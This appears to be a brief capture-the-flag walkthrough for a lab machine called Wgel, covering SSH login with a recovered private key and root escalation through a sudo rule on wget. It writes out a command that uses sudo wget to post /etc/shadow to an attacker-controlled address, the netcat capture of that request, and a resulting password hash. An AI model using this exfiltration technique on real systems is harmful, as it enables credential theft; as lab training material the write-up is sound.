Wgel

Permissions

Assign The Correct Permissions To ID_RSA

Permissions
SSH

chmod 600 id_rsa

ssh -i id_rsa wgel@VICTIM_IP

Privilege Escalation

We can Login using the Private SSH Key

jessie@CorpOne:~$ id
uid=1000(jessie) gid=1000(jessie) groups=1000(jessie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

The User jessie can run: /usr/bin/wget as ROOT
wget can be used to Access Files on the System.

jessie@CorpOne:~$ sudo -l
Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
jessie@CorpOne:~$ sudo /usr/bin/wget --post-file=/etc/shadow 10.11.30.40
--2022-10-07 12:21:03--  http://10.11.30.40/
Connecting to 10.11.30.40:80... connected.

Using netcat to get the File.

Connection from 10.10.250.65:39072
POST / HTTP/1.1
User-Agent: Wget/1.17.1 (linux-gnu)
Accept: */*
Host: 10.11.30.40

...
jessie:$6$0wv9XLy.$HxqSdXgk7JJ6n9oZ9Z52qxuGCdFqp0qI/9X.a4VRJt860njSusSuQ663bXfIV7y.ywZxeOinj4Mckj8/uvA7U.:18195:0:99999:7:::
...

Permissions​

Privilege Escalation​

Permissions

Privilege Escalation